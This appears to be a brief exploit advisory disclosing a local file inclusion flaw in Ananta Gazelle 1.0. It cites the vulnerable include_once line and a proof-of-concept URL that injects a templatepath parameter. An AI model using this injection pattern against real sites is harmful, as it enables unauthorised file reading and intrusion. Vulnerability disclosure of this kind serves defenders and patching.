Ananta Gazelle 1.0 Local File Inclusion

Ananta Gazelle version 1.0 suffers from a local file inclusion vulnerability.

MD5 | 4787a2aeca9fd059da95526643ec3db8

Download

============================================================================================================================
| # Title     : Ananta Gazelle 1.0 LFI Vulnerability                                                                       |
| # Author    : indoushka                                                                                                  |
| # Telegram  : @indoushka                                                                                                 |
| # Tested on : windows 10 Fr V.(Pro)                                                                                      |
| # Vendor    : http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/Ananta_Gazelle1.0.zip/              |  
| # Dork      : n/a                                                                                                        |
============================================================================================================================

poc :


index.php

line 163 

include_once($templatepath."/index.php");

http://127.0.0.1/gazolina/index.php?templatepath= ev!l

Greetz :----------------------------------------------------------------------------------------
                                                                                               |
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic              |
                                                                                               |
================================================================================================

Source: packetstormsecurity.com